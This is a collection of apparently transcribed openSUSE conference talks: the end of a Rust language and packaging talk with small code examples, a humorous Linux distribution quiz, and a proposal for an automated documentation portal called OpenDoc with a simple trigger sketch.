We then create this five and assign the variable a to it. So at this point, main owns a, and we can actually read from it and print it. If we then create a second variable called b and assign a to it, and then try to access a at this point, the compiler doesn't let us, because ownership of the boxed memory that we assigned to a has now been transferred to b. So Rust will no longer let us access a, because a no longer owns that memory; that memory has moved on. If you uncomment this line and try to compile this program, the compiler will say: no, a doesn't own this memory anymore, you can't access a. And in the same way, if you take the variable b and pass it to a function like this that takes a box, ownership is transferred to that function. If you try to use b after this point, the compiler will no longer let you. It will say: no, destroy_box owned that memory, and at the end of its scope the memory was freed, because the owner of that memory went out of scope. So it's no longer available — it was freed. At this point you will probably say: wow, this is completely unusable. If I can only use a variable once, how can I do anything? If I put destroy_box in a loop here, it won't compile, because only in the first iteration of the loop will it pass ownership to the function, which then frees the memory, and the compiler will say: well, in the second iteration there's no memory anymore, you can't do this. So the way we get around this in Rust is with something called borrowing, which is where you can say: I'm still the owner of this memory, I want to call this function and pass it this memory, and I let it borrow the memory for a while; when the function completes, I'm still the owner, the memory is still mine. The way you do this is with the ampersand — the & here, where we're saying that in this scope we're borrowing the memory of this Point, which is a struct just like in C that has three members. So point is the variable, and main is the scope which owns this memory, owns this variable. We create a second scope in here and we borrow it using the &, and we can use it to look at it. But by default borrows are immutable — const, you would say — so you can look at the values, and at the end of the scope the main scope still has ownership, but we can't assign to it through the borrow. To get a mutable borrow, we have to use the &mut operator, and here we can actually... So ownership is still maintained by main, but the write rights, so to speak — the right to modify the variable — are temporarily transferred to this other scope, this other variable. We can assign to the structure in here, and at the end of the scope those rights are transferred back. So at this point, the main point variable has the rights again. And those rights are actually tracked when it comes to writing: there can only ever be one writer to a piece of memory. The compiler will actually make sure that there's only one piece of code at any time which has the right to modify the memory. And that is the reason why all Rust code is actually thread-safe as well: no matter how many threads you have, only one of them is allowed to modify the memory at any point, and at compile time it will actually verify that this is true. So that's pretty cool.
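A condensed sketch of the move-then-borrow discussion above — reconstructed, not copied from the slides; the commented-out line is the one the compiler would reject:

    #[derive(Debug)]
    struct Point { x: i32, y: i32, z: i32 }

    fn inspect(p: &Point) {
        // An immutable borrow: we may read, but not modify, and the
        // caller keeps ownership.
        println!("point is at {:?}", p);
    }

    fn shift(p: &mut Point) {
        // A mutable borrow: for its duration this is the only place in
        // the whole program allowed to write to `p`.
        p.x += 1;
    }

    fn main() {
        // Moves: `a` owns the heap allocation, then ownership moves to `b`.
        let a = Box::new(5);
        let b = a;
        // println!("{}", a); // error: value moved to `b`, `a` is unusable
        println!("{}", b);

        // Borrows: `point` stays owned by main the whole time.
        let mut point = Point { x: 0, y: 0, z: 0 };
        inspect(&point);   // temporary read-only access
        shift(&mut point); // temporary exclusive write access
        println!("after shift: {:?}", point);
    }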
But it's also pretty tricky to write code in Rust because of this. Another aspect of Rust which is a little bit different from other languages is what's called traits. The language which I think this is most similar to is Haskell, but it's also a little bit similar to the interfaces that you have in Go. In Rust, you don't have classes like in C++ or Java. What you have is structs, just like in C, and then you have traits, which describe collections of functions that operate on a particular structure. So in this case, we're defining a trait Animal, and we're defining a set of methods which can be applied to an animal. But we're not actually defining any kind of structure that implements this trait at this point. There's no base class, no root object that is the default implementation. What we're saying is that there is such a thing as an animal — we haven't actually described any yet. These are not actual functions that you can call at this point; you need something that implements the trait. The way this is done is that you define a structure, and separately from defining the structure, you define an implementation for it. So this is just implementing some functions for the structure: we have a struct Sheep, and separate from the structure definition, we define some methods for Sheep. And this can be done multiple times, so you can have multiple blocks like this where you're defining methods that apply to Sheep. It's not like a class in the sense that it couples the data of the structure with the methods that can be applied to it — you can actually separate those. You can have a library that provides methods for a structure that is defined elsewhere. And then we can implement the Animal trait for Sheep, implementing these functions for the Sheep type in particular, which then lets us use these methods on Sheep structures, or on other structures that also implement the Animal trait. We can have a function that takes an animal as a parameter and uses the methods of Animal on it, and we can pass the Sheep to that function and it's just going to work. And this is all more similar to C++ templates than to C++ classes, in the sense that it is all resolved at compile time: the compiler figures out which method to actually call for the animal in question. The way you would use this is that you would create a variable like this, and here you can see a little bit of the type inference in Rust, where it figures out that it needs to call the function that creates the Sheep, because the variable that we're assigning it to has the type Sheep. That's a little bit tricky, because it actually goes the other way. In the previous examples, like here, for example, we have a value of an obvious type — we have some memory of a certain type, and we just say, okay, let the variable point be that type, and the compiler figures out: okay, this is of type Point, so the variable also has to have that type. But in this case it's going in the other direction. It's saying: okay, we have a generic function here that creates animals, and we're assigning the result to a variable of a specific type, so that generic function must actually be the Sheep constructor. So it can go in that direction as well. All right.
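The trait example being walked through sounds like the classic Animal/Sheep one; a compact reconstruction of that pattern, rather than the literal slide content, might look like this:

    // A trait declares a set of methods without tying them to a type.
    trait Animal {
        fn name(&self) -> String;
        fn noise(&self) -> String;
        // Traits may also carry default implementations.
        fn talk(&self) {
            println!("{} says {}", self.name(), self.noise());
        }
    }

    struct Sheep { name: String }

    // Plain methods for Sheep, defined separately from the struct itself.
    impl Sheep {
        fn new(name: &str) -> Sheep {
            Sheep { name: name.to_string() }
        }
    }

    // The trait implementation is yet another separate block.
    impl Animal for Sheep {
        fn name(&self) -> String {
            self.name.clone()
        }
        fn noise(&self) -> String {
            "baaah".to_string()
        }
    }

    // A generic function that works for any type implementing Animal;
    // the concrete type is resolved at compile time, like a C++ template.
    fn greet<A: Animal>(animal: &A) {
        animal.talk();
    }

    fn main() {
        let dolly = Sheep::new("Dolly");
        greet(&dolly);
    }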
I also put up the definition of the println! macro here. What this does is it says: when the compiler sees the println! macro, it passes the expression that the macro was given to this code, which is then replaced at compile time. And the difference between this and just having a function is that this is all done at compile time. So here it's actually calling print! and concat! while compiling; at runtime, the result is just a string constant. If you're used to using something like Ruby or Python or another language like that, that's just total nonsense, because there is no compile time versus runtime in the same sense. But if you're coming from C or C++, then there is an actual difference: the code execution in these macros happens when compiling the code, not when actually running the program. I think for learning Rust, in the beginning you don't really have to use macros at all; it's more of a neat feature later on, I guess. Some of my favorite things about Rust so far are match and if let, which is pattern matching. This is something from Prolog, and Erlang also has a lot of it, I think, but it's also coming into other languages: at compile time you say, okay, I'm returning either this or that from this function, and the compiler can check that I'm actually handling all the cases. In Rust there is no null at all. Instead, functions can return optional values: you return either this object or nothing, and at compile time it will check that you actually made sure you got what you expected. So there's no way to write code that is null-unsafe in that sense. Yeah, traits I talked about. And then the next thing is cargo, which is the package manager for Rust. And I know Lars is now looking at me like I'm crazy, because we already discussed the pains of package managers in languages. But cargo is quite nice — and I'll get into the problems it creates for us as openSUSE people later. Cargo is a tool that helps with using libraries and setting up projects. So instead of using the Rust compiler directly, you can use cargo to manage your project. The way you would create a new project for our little hello code that I showed in the beginning is that you would call "cargo new hello", and it will create a Git repository for your project and create a little main function and everything, and set everything up so you can compile a binary from that. The main definition of a cargo project is the Cargo.toml file. TOML is an INI-like file format where you define the name of your project, the author name, the version of the project, and then all the dependencies of the project. And if it produces a library instead of a binary, you would define that here as well. Then to compile, you just run "cargo build" and it takes care of compiling if necessary, and so on. So that's quite nice. Together with cargo, there is something called crates, which are the packages for Rust. There is crates.io, which is a package hub just like for other languages. The way you would use it is that in your Cargo.toml you define dependencies. Let's say we use the rand crate for random number generation: we define the version we need in the dependencies, and then we run "cargo build" and it magically, incredibly, just goes out on the Internet, finds rand and all the dependencies for it, downloads them, compiles — great. So yeah. Okay. So now I'm getting into the problems with this and where we are at right now.
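Before the packaging part, one small illustrative example — not from the talk's slides — of the match / if let / Option point made a moment ago:

    // There is no null: a value that may be absent is an Option, and the
    // compiler insists that both cases are handled.
    fn find_even(values: &[i32]) -> Option<i32> {
        for &v in values {
            if v % 2 == 0 {
                return Some(v);
            }
        }
        None
    }

    fn main() {
        let numbers = [1, 3, 4, 7];

        // `match` must cover every variant or the code does not compile.
        match find_even(&numbers) {
            Some(v) => println!("first even number: {}", v),
            None => println!("no even number found"),
        }

        // `if let` is the shorthand for when only one case matters.
        if let Some(v) = find_even(&[5, 9]) {
            println!("found {}", v);
        } else {
            println!("nothing found");
        }
    }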
Currently, the people contributing to the Rust packaging on openSUSE are this list — I think there are actually some more people who have gotten involved since I wrote this. But the main guy is Michal. I don't know if you're here — oh, great, I'll talk to you later. So he's done most of the work in getting the compiler up to date and getting cargo in there and so on. But there is still a lot of work remaining. Currently we have two main projects under devel:languages: there is the Rust compiler and there is cargo-bootstrap, which builds cargo. And the reason it's called cargo-bootstrap is that it's not quite building itself in the right way yet; we're using a Python project created by some Debian people to build cargo without cargo. Because the problem is that the Rust compiler is written in Rust, so to compile the Rust compiler, you need the Rust compiler. And cargo uses cargo to build itself, so to build cargo, you need cargo. Figuring this out is not that easy. Right now my goal is to get the Rust compiler into Tumbleweed at least by Rust version 1.10, because they made a big, important change in their policies as of Rust 1.9, which is that they promised that Rust 1.10 will be able to build itself using Rust 1.9, and so on. So if we manage to package Rust 1.9, we can then use our packaged Rust version to build Rust 1.10, and by that point we're bootstrapped and up and going, so we can push it into Tumbleweed and remove the binary package for Rust 1.9. And when Rust 1.11 is released, we can rebuild it with our 1.10 package. This is very similar to the way you would have to package GCC from the beginning: GCC is written in C, so you need a C compiler to compile GCC — you have the same problem there. It's just a little bit trickier than it might seem to actually figure out how to do this correctly. Yeah, so that's that. Cargo is even worse, because cargo is a cargo project with a long list of dependencies. So to build the initial version of cargo, we need a fake cargo, or a binary package of cargo, which we can use to build that version of cargo, and we need to get the package management up and running to get this working. That's the point where we are at now, and then there's the point after that, which we haven't even gotten to. My idea for the future is that we will combine the approaches of the Golang packaging — I think it's Marguerite Su who has done most of that work for openSUSE, packaging Go modules as RPMs — with a little bit of how the Ruby stuff is managed using gem2rpm, which is quite nice. I've started working on that: in my home project there's something called cargo packaging, which doesn't work at all right now, but that's the point where I'm at in looking at packaging Rust and getting it into openSUSE. Beyond this, there are a lot of unsolved issues with actually using Rust and getting it into SLE, for example. There is no stable ABI for Rust itself, which means that if you compile your Rust program with a certain version of the Rust compiler, that comes with a certain standard library, and if you update your Rust compiler, you have to recompile your program — otherwise it won't link correctly if you use dynamic linking. So right now we're limited to static linking, building everything into one binary, which is not great for security updates and so on.
The other problem is that the compilation of Rust itself and of Rust programs is extremely slow and memory-intensive. To compile the Rust compiler, we need at least eight gigabytes of RAM, and right now I think the build VM is defined to have 50 gigabytes of disk, and that's actually failing sometimes because it runs out of disk anyway. I don't even understand how it can possibly use 50 gigabytes of temporary space while building the compiler, but there we are. It also currently needs its own custom version of LLVM to build Rust, because Rust is based on LLVM and they have some patches to LLVM. So that's another issue: we can't just use the LLVM which is already packaged for openSUSE, we actually have to build LLVM again just for Rust. Those are issues that remain to be solved. The ABI problem is something that we can't solve ourselves; we have to wait for the Rust community to do that. And it's also one of the problems that I think is really difficult to solve, because it's really only a problem for us as distributions — it's only a problem for Red Hat and SUSE and a few other people. Mozilla, for example, doesn't care about static linking; they just link statically and it works for them. So that's one of the issues we have. My main point is: please help with packaging Rust. If any of the people who were involved in packaging the Go packages, for example, or Ruby for openSUSE want to get involved in helping out with Rust, that would be great. Because as far as I know, both me and Michal don't really know that much about RPM macros, and this is all magic to us. We just want to get the compiler working. So any help you can give us would be fantastic. Any questions? Yes, the other microphone. When do you expect to be able to do the bootstrap of Rust, then, so that you can do the continuous updates, etc.? So 1.9 was released a few weeks ago, and they're on a six-week release schedule, so the next version of Rust will be 1.10, which will be released sometime in July, I think. I'm hoping to have at least the Rust compiler ready to submit, or hopefully accepted into Tumbleweed, by that time. That's my hope. All right, thank you. Oh, another question. Is there already some bigger software written in Rust? Yes. The biggest project right now is the Servo browser, which is being built by Mozilla. This is the next version of Firefox, where "next" means not the next version but sometime far, far in the future. So it's a whole new browser. I think they've gotten pretty far in standards compliance and so on, but when it comes to actual browser features, they still have a long way to go. There is also something called Habitat, I think, which is developed by the Chef people — the people who make Chef — which is a part of Chef somehow and which is written in Rust. I don't know anything more about it, and I may have gotten the project details wrong. I think there are a few other big projects, but nothing very open: there are big companies using it, but they haven't released anything publicly. But there is a lot of interest in Rust. It's still a very new language and it's still being heavily developed. So if I were going to develop something for production today, I probably wouldn't use Rust right now, but soon I think it will be usable. Yeah. All right. Thank you.
Thank you. Thank you. Thanks, sir. Thanks a lot.
This talk will be a short introduction to the Rust programming language, why it is useful and why you would want to use it. Then I will discuss the current state of Rust in openSUSE, what the situation is regarding packaging crates and what remains to be done.
10.5446/54599 (DOI)
I'm five minutes behind my schedule. And I have ten minutes for this talk. Here we go. I'm Markus Feilner. Some of you may know me. I'm the team leader of the SUSE documentation team. And a disclaimer applies to all of this: if you want to have the story behind any one of these lines, please come up to me, and for a beer I may tell you the story. I have a little distribution quiz for you. And the thing works very simply. I'll give you one sentence, one image, one hint; it's images and words. You have to guess which distribution, vendor or whatever Linux company or organization is meant. You'll figure out how this works after two or three slides. And notice: it's not meant to be funny. I was a journalist. I'm impartial. And I hope my boss won't fire me after this talk. I think we are quite open at SUSE. And I hope so. Okay. Let's roll. What distribution is that? Yeah, come on. Arch, who was that? Arch. Okay. "Ain't nobody got time to install that." Arch, he gets one, yep. So if you guess right, you get some small swag from this. Yeah. "It's done when it's done." It's done when it's done. What's this? No? Yay. "We have seen the legacy universe." No, that's us. What's "Novell, Microsoft, Attachmate"? Micro Focus. Legacy. What? Two, no. "Two of the three companies that bought us don't exist anymore." Who is that? Think about it. That's SUSE. Come on. Don't you want swag? Cool. "We can't agree upon a name for our distribution." I heard that before. Who said that? Huh? Somebody said Mandriva before. Yeah. "We own opensource.com." Is that like Linux? No, it's not. Okay, it's Red Hat. "We change the spelling of our name more often than it has letters." Yay. "I can't open your document because my LibreOffice is still compiling." Yep. You choose who wants. He already has. Give it to us. "Our community manager wants to write a book." Ubuntu, yes. "Our CEO wants to write a book." You don't know Red Hat, huh? Okay. "Our doc team leader wrote three books." Oh, I'm sorry. "We are the Microsoft of open source." Maybe. There are more correct answers for that. Ubuntu is also true. Some people say SUSE is the Microsoft of open source because we have clickable administration. Others say it's Lindows or something like that. Next: "It took seven years to finish our website." Yes, because of all the compiling. Okay, we've had that before. Who's that? Right. "We listen to our community and hence we change the desktop's color." Ubuntu did that. Somebody said it, yay. "Your grandpa used me." Yeah. "Hey, I'll tell you about my Linux." This is true. I'll tell you about it. I mean, I will tell you about it. You don't need to ask. If you're a Windows app user, I will tell you. I have to. What's that? You all right? By the way, how do you spot an Arch user at a party? You don't have to, he'll tell you. We considered our... that one's hard. I doubt somebody will know that. "We considered our Linux a Model T of distros. Then we decided to dub ourselves after a burner." No? Have you ever heard of CrunchBang Linux and BunsenLabs Linux nowadays? No? Almost done. "I once knew a guy who had been using it. He survived." Linux From Scratch. "We hired a Gentoo guy and made him head of package management." Who would do something as stupid as that? He's got it right? Who was it? SUSE. "We've only been testing this for five years. We can't ship it yet." SUSE. "What do you mean, testing? Ship it." Yes. There's a short story to that: when I was a journalist, I was not allowed to test Satellite 6 Server, which they were selling already at that time.
Last one. It's a scene: there's a plane crash, a woman is crying, "We need a doctor!" And this one Linux guy comes along and says, "Step aside, ma'am. I am an Arch user." Step aside, ma'am, I'm an Arch user. I said it. So please contribute to this thing. Send me your suggestions for stupid stuff like that. Thank you very much. And of course, this was not funny.
I assume this will be the last talk I ever give, because after this every one, every single distribution's community will be out to kill me. Ladies and Gentlemen, bring your hatchets! I have collected quotes, sentences and assumptions that speak for themselves. While I am only showing one sentence each slide, the audience will have to guess the distribution that is meant. Be prepared to discuss: Who is the "Microsoft of open source?" Who thinks they own open source? Who was bought twice, while both buyers don't exist anymore? Who has hired a Gentoo guy as head of package management? Who is still compiling Libre Office and can't open a document therefore? What's that distribution with three, four, five names, constantly changeing? Add your own, this Lightning talk is open source, and a call for your ideas and discussion.
10.5446/54600 (DOI)
So, hello everybody and welcome here in this audience and thank you for coming as so many people and hi to all the millions and billions in the different variety of the Internet's out there. I'm Marcus Farner. I'm happy to have you here. Thank you. Thank you. Oh, that's it. That's all I wanted. Goodbye. No. I'm here to present an idea and I am fully aware that this, that I am presenting here is the produce of a lot of talking, quite some beer were involved in fact and quite some ideas are involved and it is, it is nothing that is finished of course. It's just an idea and I am here because we want to hear from you, the open Susie community, what you think about it and if you think this is possible and we are basically we are trying to make something impossible. It's about automating documentation which is impossible and you will see that. Well, I'm here. I'm Marcus Farner. Some of you may know me, I guess. And with me is, I'll tell you about me. With me is Richard Heigl from Hello World. Richard Heigl is an expert in knowledge management and in the course of this talk I will tell you why he is here. I am team leader at Susie for documentation and I am absolutely impartial. I was an open source journalist and that's why I am absolutely neutral. Some people say I am a Linux expert. I wouldn't say no, I'm not. I would say no, I'm not. I have been working with Linux since 1994 and I have quite some other maybe interesting stories to tell. I am a conch diplomat, I'm a priest. I'm a Jedi knight, I'm Encelado citizen number four and I own some property on the moon. And my boss says I'm running through the worst. So that's what I hear from one of my colleagues recently. If you want to know more details about either one of these things, just talk to me and ask me about it. And for the non-German speakers, if you feel any emotions involved with this talk, which I think will be inevitable, just get some hugs for that. So I want this thing, as I said, it's something for discussion. I want to hear, we want to hear what you think about it. All of these next sentences will be, I guess, maybe controversial, more or less. I think open source communities do not write documentation. You can always contradict me, prove the opposite. You think they do? I think, do you think I'm right? Thank you, Jürgen. Next one. Developers want to write code, not documentation. I just said this several. Every open source project needs documentation. And documentation cannot be automated. There's always humans who have to write documentation in the end. Though good software should not need documentation, it should be self-explanatory, proper documentation, resources are essential to attract new users. It's mostly the newbies or the ones who are new to something who need documentation. Tumbleweed is a rolling release. No, yes, it is. And it's moving way too fast to be properly documented. Nobody disagrees? Good. Seems like I did my homework at least a little. Nevertheless, there's a lot of data. We have a lot of information that we are gathering. We have data in this open source of Wiki. We have data in the mailing lists where people discuss solutions and discuss about good or bad solutions to problems. We have stuff even in the build service. The build service has a lot of information about version numbers and more. We have information in forums and release notes and get comments. And there's the documentation that we, the SUSE documentation team, provide. We develop new forms of documentation like the SUSE best practices. 
So, sort of like modern style how-tos for achieving single tasks with SUSE products. So there's a lot of documentation. And that's not all. That's just what I just, this was the point that out here. It's just a little bit, a little tiny bit of the documentation that is around in open SUSE. And in SUSE, and there's even more with some other projects somewhere out there, anywhere, there's still even more stuff somewhere in other forums outside. So, what? This picture is hanging over here. I thought it was in the other room, so I put this picture here. It says, this ball painting, it says, if what you say is true, the Shaolin and Kogan could be dangerous. And I think this is pretty much what's happening here. We have some, we have five facts and I think it's, there is a solution, there may be a solution to it. Community and documentation are difficult couple. Oops. Wrong. What is it? Jump over. We have a lot of information in a lot of places. I took this picture last week on a longer holiday trip to northern Germany. It's a beautiful beach. It's called the Amber Beach. And if you dig a little bit, on the beach, you'll find quite some worthy stones, some gems. And it's, and that's what it's all about. It's about finding and presenting it. We have lots of information, but we fail in finding and presenting it. And I, and now we come to the last one. The last fact, or the one before last fact, Tumbleweed is changing faster than anybody can document. Oh, really, I don't believe that. We can do better because nothing is written in stone. That's why I want to introduce the idea of OpenDoc. OpenDoc is just the name that I thought about for this project because I think it just fits. And it's sort of, for those, for those among you who know about quantum mechanics, they will understand what this means. It's making the sort of the impossible possible. And therefore you have to split your mind and go, split your mind and go in both ways. It's easy. If you've done it once, it's easy. Think of OpenQA. OpenQA is a success story, and it was invented some years ago to automate a tedious, unwanted task. And that was basically the idea, the role model for what happened in a knowledge management workshop by this Mr. Heigl here. And we were sitting together at SUSE earlier this year. We talked and we had an idea. What if we could just use the concepts that are in OpenQA in a way to help gathering, collecting the input for documentation automatically? Because when you write documentation, you always have to look for the stuff that needs to be documented. You have to spot the stuff that needs to be documented. And you have to find the content. And that's the problem that we have. We have a lot of data, but nobody knows where it is and that it is there. And so what if you could use automated triggers to collect this information, the changes, the news on tumbleweed, that automatically refine them and paste them into a modern dynamic, somewhat semantic portal? It's not about a new tool. And I say that because at SUSE we are very good in tool debates or in Open SUSE also, I think. And we are, it's good to question everything. But what I think of as OpenDoc is just a presentation layer for many other tools. It should be open. It should include an indexing waiting search engine with crawlers that search no matter what helpful new website of SUSE or this tiny little project somewhere would come up with. 
So like a modern search engine: you just throw in another URL and do some search-engine language magic to weight it and have it presented. On top of this crawler that crawls websites, you could have triggers that act like agents and tell the portal: hey, I've got something. Here is something that fits your criteria. That might be interesting. And the agents would tell that to the portal. The portal itself shows a list. I put this list in inverted commas because, you will understand, in about 20 minutes you will know why I put this in inverted commas, because this list is not a list. But let's just talk about it as a list. It shows a list of recent changes, problems, questions asked, or topics highly discussed or relevant or whatever. And as I said, this list is not a list. And this is a long slide. I hope you still understand it. I'm sure you do. It's semantic, it's weighted, it's a presentation. For example, like tag clouds, some of you may be familiar with that. This is a list. This is sort of a list, but it's a weighted list, because in this list the term Web 2.0 has been searched or read or commented or disapproved more than the other terms. So this is a weighted list, I would call it. I may be wrong, but it's just my naming of it, to make it understandable what I think of. We also have colorful tables that compare, for example, one project with another. In terms of, for example, how many mailing list and forum discussions there are, how old the versions are, how many errors and mistakes are in there, whatever. So that would be a comparison, an easy visual comparison. For example, as we have in Weblate; some of you may know it, because I think there's also a talk about Weblate here. And Weblate is a tool that has a website, a dashboard, and with one view you can see where translation work needs to be done. For example, Kiwi is 51% translated. You have different categories with green and red and not done. So with one view, you can see things much easier and faster than in a real list with numbers and whatever. So this is also a list, but it has some visual component in it. And the best thing is: the information is already there. We have the information. So what's a trigger? A trigger could be, as I said, an agent that feeds data into an OpenDoc. It could be any agent. Like, for example, when you have one of our mailing lists, and there's a discussion going on about the latest version of systemd or whatever, and you have 200 comments, but it's only two people discussing. I would say the criteria would at least be: is the topic interesting, how many people are involved, how long is the thread. You could define a trigger that automatically puts an item on the OpenDoc portal if one of these threads gets long enough and if some relevant people that are known as not being trolls or bots are involved. And that could trigger an entry on the portal, for example. The same applies to forums. Or it could be the standard email from OBS, the Open Build Service, telling you about the updates that they have done this week in Tumbleweed. But it could also be a hashtag in a commit command. If you commit, if you do git commit, just add a hashtag or whatever to your command, and that would trigger an entry on the OpenDoc portal. It could be a keyword in the release notes.
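The mailing-list example above is the easiest one to picture as code. Here is a minimal, hypothetical Python sketch of such a trigger; the thresholds, the portal endpoint and the post_to_portal() helper are all invented for illustration and are not an existing OpenDoc API.

```python
# Hypothetical mailing-list trigger for the OpenDoc idea described above.
# Thresholds, the portal URL and post_to_portal() are invented for this
# sketch; a real agent would also have to parse the actual list archive.
import json
from urllib import request

MIN_MESSAGES = 20          # "the thread gets long enough"
MIN_PARTICIPANTS = 5       # "some relevant people are involved"
KNOWN_TROLLS = {"troll@example.org"}

def thread_is_relevant(messages):
    """messages: list of dicts with 'author' and 'subject' keys."""
    authors = {m["author"] for m in messages} - KNOWN_TROLLS
    return len(messages) >= MIN_MESSAGES and len(authors) >= MIN_PARTICIPANTS

def post_to_portal(subject, url, score):
    """Create a weighted entry on the (made-up) portal endpoint."""
    payload = json.dumps({"title": subject, "source": url, "weight": score}).encode()
    req = request.Request("https://opendoc.example.org/api/items",
                          data=payload, headers={"Content-Type": "application/json"})
    request.urlopen(req)

def run_trigger(thread):
    """thread: dict with 'subject', 'archive_url' and 'messages'."""
    if thread_is_relevant(thread["messages"]):
        post_to_portal(thread["subject"], thread["archive_url"],
                       score=len(thread["messages"]))
```

The same skeleton would work for forum threads or OBS notification mails; only the "is this relevant?" function would change.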
It could be a special topic or a keyword in mailing list or a forum that you have been searching for. It could be predefined entities and documentation, whatever. It could also be external, like a demon monitoring social networks discussions about a topic. For example, if you're a release manager and there's a discussion going on because your latest version of your software was really messy and there were lots of mistakes inside, you would want to be informed automatically about it. So that's what an agent like that could do. And what we can, what can we get out of this, all of this data collected then aggregated into one portal? Well, something sweet and nice and tasty, I hope. Imagine an automatic and human distillery refining all this information. I have a screenshot here and I think you, Richard, will also talk about Stack Overflow later a little bit. If you know Stack Overflow, you probably already know what I'm talking about. Now, Stack Overflow also presents data in lists, but you can tag, you can vote, you can have the list, have individual views on the list. And lots of information has been, information is entered by humans here, but you can, if you click on hot, you'll have a different list or a different sorting of the same results that are in the system. And by just clicking one to five stars or did that help, whatever, the data gets more helpful to others. So this list should allow and should encourage users to rate, to mark, maybe to kick some topic as not relevant or outdated or even to tag as hot or whatever you could also create relations like this is related to virtualization or whatever. As with Stack Overflow or similar, the stuff that is rated higher will be presented more often, not relevant stuff should go down the list. In this way, and, oh no, sorry, different sentence. That also means you could have individual preferences, individual, an individual approach with your own login or whatever to this portal where you could set different types of lists because you are a user, a developer, release manager, package maintainer or whatever. You may have like your own personalized dashboard. And these criteria that you use could like define relevance for single users for you because you might be different. Different in a way. Some movie fans will have recognized. Like the good, the bad, the ugly. The release managers or developers could use OpenDoc or such a dashboard to find out what's wrong, working good, bad, ugly about their own project. Individual dashboards I've already said that it could also be live tracking of development if OBS or if triggers deliver constantly, constantly deliver data. And it could also be used for analytics like the comparison of projects or tasks like Weblate. We have lots of this stuff. We have lots of the, we have all the data. We also have some websites like that. What I'm talking about is sort of an aggregation, a portal that aggregates that. And at this point, we were talking about, well, how could we, how could this technically work? What could be used as basis for such a portal to fulfill those needs that I talked about? And that is where the knowledge management expert came in. And at this point, I just give, pass the microphone on to Richard because he can tell us and give us some examples about how the Wiki World might help us in that. Hi there. Thank you for being here. 
So my part in this talk is that I share a few experiences we have made in the Wiki World of the last 10 years because we have seen that there is not only a community, there is, there are thousands of information, there is knowledge sharing. You have unbelievable many sources. And how can we cope with that? And some people would say, okay, yeah, Wiki is something, this is like Wikipedia, it's a bit old fashioned. And I don't think so. Wiki has principles and has shown many ways how we can collaboratively share knowledge and aggregate knowledge and bring people together and bring some structure in this whole process. So what I will do now in this talk are two things. First, I will give you such a few ideas how we can start the process to improve the documentation and how we can automate it. And the second thing is I would show you three websites. They can give, have some ideas what's possible. And this is for the next discussion, I think, could be very interesting. So always if it comes to organize, start a knowledge platform, doesn't matter what it is, for what it is, you have to do a few things. The first thing is you have to answer the question, how do we retrieve knowledge? How do we, can you find knowledge today? So Marcus already said, yes, we need a proper search. That's always the basis. We have many guys out there thinking that a search is everything. A search can do everything. A search can do a lot. And yes, it's true. And I'll show you a few examples that a semantic search and good filters will help us a lot to do that. It's not about, again, it's not about tools today, but this is the experiences we made and this experience and the way we are going and heading to today, even Wikipedia and Wikipedia communities around the world. What is semantic? Maybe just for a few people who don't know what it is. Semantic is a funny word for something. Very easy. You learn how to work with meter data, structured data like the author of an article, expiry dates, build numbers or whatever. And normally you have all these information in the content somewhere hidden and that a search can use it. You must set a markup and say, this is a date and this is an author. And then you can do really great things with that. Another thing I want to mention and really want to emphasize is that if it comes to knowledge, you need unique IDs. Wikipedia offers only one article per topic and works with redirects and that for very, very, very good reasons. So if you see it's like overflow, then you can start any topic you want to. Oh, this is Richard's library. I want to talk about the library of Richard's library page and something on you. Find five places or 10 places discussing the same stuff, documenting the same stuff. And in Wikipedia, you are forced, people are forced to use one page and one article to talk about. And because human beings are not really good in memorizing numbers and data, it's normally an article, an article title. And this is something we have to head for that one thing, if you have some information, some knowledge, you should attribute, you should attach it to one point and then you can start and you will find things much better and your search will find it much easier. The next thing is, okay, how will we collect knowledge? And now you see, you can make it on your own, you have ordinary authors, but you can do a lot of these things together with your tools. You can automate it. So Mark has said already, okay, let's define some triggers. 
Somewhere out there, there is an important information. This information will come to the new open.platform and will make a new post. Hi, here has something changed. Maybe for somebody is this interesting. Other things, engines can do much better than human beings normally is changing meter data. Oh, that's a new release number. So you don't have to change that in many ways. On many platforms do it once or let it do it your platform. Next thing is, now you need human beings for classification. It's always the same. You can say, okay, this information belongs to another article. You can map it. You can say, okay, there is something similar. There are dependencies. There are other topics and you can rate these information. You can say that it has a high quality or is an important change for us and other people should see it. Things you can do, maybe a bot can do, but normally ordinary people do it, enrich your content, add some screenshots, diagrams, videos, attachment, whatever. So OpenDoc can collect all these things. But it also should make some proposal for us to do. So it can tell us, hey, there are links missing. There are often expired posts. Old and not confirmed pages. That's what they do at Wikipedia. Old and not confirmed pages is a very important thing to make the quality assurance in Wikipedia and Wikipedia similar platforms. References, resources. I will hurry up with that. And the other thing is, okay, you want to stay informed. So an ordinary thing is, which is common, is you can follow a topic. You can follow the category. You have your stream. You have your own task list. All these things is very common. But this should be brought together in the plan. You have different ways to work this, but you should put the right ones. This is the question we have to answer now. Last thing, Wikipedia, it here's to its versioning system. That's often forgotten. It's very, very important that you have control over what has changed. Even if the bot has changed it or your neighbor, it doesn't matter. You have to see what has changed. And maybe you must make some rollbacks to that. So, and last one is, obviously, you must find ways to archive. You must have ways to delete information and knowledge. That's, that are things most people don't see at Wikipedia, but it happens every day. They have a huge process for deleting information and not only deletion discussions, but also automatic forms for, get rid of outdated information. So a few examples. That's the second part. We talked already about Stack Overflow. So I don't want to get too deep into that. I show you three other platforms. One is Shift Lock. That's a customer's project. We realized this year. And I will show you a bit about streaming, about attributions, filters and semantic. Research is about, is a head-resort platform. Quite funny. I love it because of the search there. And Translate Wiki is a translation platform for the Wiki communities and for open source software projects. And they can show us a bit about task lists. Oh, there it is. Okay. Yes. Unfortunately, this is German because it's for a German company. The story behind that is, there's a huge amount of, they have to document a plant somewhere here in Germany. And they have people who are responsible to maintain the plant. And they need a book or they need a list. What should we, what have we done? What is to improve? We have some messages. And the thing is, Shift Book is a Shift Book. So what you see now, this is actually, this is a media Wiki on, in the basis. 
